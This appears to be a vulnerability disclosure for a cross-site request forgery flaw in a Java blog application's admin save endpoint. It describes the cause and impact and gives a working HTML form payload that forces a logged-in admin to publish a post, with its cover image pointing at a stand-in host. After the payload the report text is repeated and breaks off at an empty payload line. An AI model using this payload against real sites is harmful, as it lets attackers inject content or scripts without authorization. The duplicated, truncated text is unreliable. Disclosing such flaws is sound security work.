Description
The com.site.blog.my.core.controller.admin.BlogController#save interface does not implement CSRF defenses. By inducing an authenticated admin to trigger a cross-site request, an attacker can publish or modify blog posts.
Impact
Attackers can inject unauthorized content, misinformation, or malicious scripts (XSS) into the website’s blog posts. This damages the site's credibility and can be used to redirect visitors to phishing sites.
Cause
The server accepts POST requests for blog creation without verifying the origin or requiring a unique per-session token.
com.site.blog.my.core.controller.admin.BlogController#save
Arbitrary blog post upload
Before the attack
攻击
After the attack
payload:
<form action="http://127.0.0.1:28083/admin/blogs/save" method="POST" enctype="application/x-www-form-urlencoded">
<input name="blogTitle" value="CSRF post" hidden>
<input name="blogSubUrl" value="" hidden>
<input name="blogCategoryId" value="1" hidden>
<input name="blogTags" value="xss,csrf" hidden>
<input name="blogContent" value="pwned" hidden>
<input name="blogCoverImage" value="http://evil.test/c.png" hidden>
<input name="blogStatus" value="1" hidden>
<input name="enableComment" value="1" hidden>
<input type="submit">
</form>
Description
The com.site.blog.my.core.controller.admin.BlogController#save interface does not implement CSRF defenses. By inducing an authenticated admin to trigger a cross-site request, an attacker can publish or modify blog posts.
Impact
Attackers can inject unauthorized content, misinformation, or malicious scripts (XSS) into the website’s blog posts. This damages the site's credibility and can be used to redirect visitors to phishing sites.
Cause
The server accepts POST requests for blog creation without verifying the origin or requiring a unique per-session token.
com.site.blog.my.core.controller.admin.BlogController#save
Arbitrary blog post upload
Before the attack
攻击
After the attack
payload: